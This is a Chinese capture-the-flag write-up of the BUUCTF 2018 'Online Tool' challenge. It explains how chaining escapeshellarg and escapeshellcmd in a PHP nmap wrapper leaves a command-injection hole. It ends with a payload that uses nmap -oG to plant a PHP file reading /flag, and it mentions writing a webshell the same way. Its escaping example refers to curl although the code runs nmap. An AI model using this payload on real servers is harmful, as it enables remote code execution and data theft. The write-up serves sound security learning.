[BUUCTF 2018]Online Tool 1

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

还是太菜了，一步一步来吧（呜呜呜）
首先看代码

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

判断$_SERVER['HTTP_X_FORWARDED_FOR']是否存在，如果存在，将它的值赋给$_SERVER['REMOTE_ADDR']

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
}

检查host是否设置，如果没有设置则点亮代码，否则执行下面语句

else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

主要看这个 $host = escapeshellarg($host); $host = escapeshellcmd($host);
escapeshellarg和escapeshellcmd是两个php函数
escapeshellarg：
返回一个转义的字符串，并且结果会被单引号包裹起来
escapeshellcmd：
将下面这些字符转义，即加上\，确保不会解释为shell操作符

&
;
|
'
"
>
<
\
*
?
~
^
(
)
[
]
{
}
$
\n

最后的部分

    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    //创建一个沙盒名称
    echo 'you are in sandbox '.$sandbox;
    //输出沙盒信息
    @mkdir($sandbox);
    //创建沙盒目录
    chdir($sandbox);
    //进入沙盒目录
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
    //-T5: 设置扫描的速度，T5 是最快的扫描模式
    //-sT: 执行TCP连接扫描
    //-Pn: 禁用主机发现，假设目标主机是在线的
    //--host-timeout 2: 设置超时为2秒，如果扫描主机超时，则跳过
    //-F: 快速扫描，只扫描一些常见端口
    //".$host": 这是要扫描的目标主机，变量 $host 代表了目标主机的地址

传入的参数是：172.17.0.2' -v -d a=1
经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1'，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。
经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\'，这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义：http://php.net/manual/zh/function.escapeshellcmd.php
最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\'，由于中间的\\被解释为\而不再是转义字符，所以后面的'没有被转义，与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1'，即向172.17.0.2\发起请求，POST 数据为a=1'。

nmap命令中有个参数 -oG 可以实现将命令和结果写到文件，所以这里我们就可以通过这个命令写入一句话木马或者直接cat flag，以此来执行命令
?host=' <?php echo `cat /flag`;?> -oG test.php '
最后访问url/题目生成的md5值/test.php